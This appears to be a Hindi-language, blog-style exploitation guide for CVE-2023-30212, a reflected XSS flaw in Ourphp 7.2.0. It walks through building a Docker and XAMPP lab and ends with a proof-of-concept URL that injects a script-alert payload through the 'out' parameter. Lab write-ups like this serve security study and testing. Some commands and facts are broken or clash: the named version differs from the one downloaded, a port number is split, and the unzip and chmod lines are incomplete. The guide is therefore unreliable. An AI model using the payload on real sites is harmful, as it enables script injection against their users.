
CVE-2023-30212 के लिए चरण-दर-चरण शोषण मार्गदर्शिका, Ourphp 7.2.0 में एक XSS कमजोरी, Docker सेटअप और पेलोड इंजेक्शन प्रदर्शन के साथ।
Ourphp संस्करण 7.2.0 में भेद्यता का शोषण, जिसे CVE 2023 30212 भी कहा जाता है
चरण 1. अपने सिस्टम में Docker डाउनलोड और इंस्टॉल करें (नोट). मैं Docker का उपयोग कर रहा हूँ क्योंकि ubuntu इंस्टॉल करना त्वरित और आसान है।
चरण 2. Docker वातावरण सेटअप करें
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
चरण 3. वेब सर्वर, php और mysql इंस्टॉल करें। इसके लिए मैं xampp सर्वर इंस्टॉल करूँगा।
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
चरण 4. Ourphp संस्करण 7.2.0 डाउनलोड करें
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
चरण 5. ब्राउज़र में Ourphp सेटअप करें अपना ब्राउज़र खोलें और localhost या 127.0.0.1 दर्ज करें निर्देशों का पालन करें और Ourphp इंस्टॉल करें।
चरण 6. भेद्यता का शोषण करना Ourphp 7.2.0 संस्करण में XSS (क्रॉस-साइट स्क्रिप्टिंग) की भेद्यता है। /client/manage/ourphp_out.php फ़ाइल में XSS कोड के निष्पादन की अनुमति देने वाली भेद्यता को कम करने के लिए,
आपको कोड को संशोधित करना होगा। यह भेद्यता तब उत्पन्न होती है जब "ourphp_admin" पैरामीटर को "logout" पर सेट किया जाता है, और नियंत्रणीय चर "out" प्रतिध्वनित होता है।
हमलावर "" जैसे पेलोड इंजेक्ट करके इसका शोषण कर सकते हैं।
Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
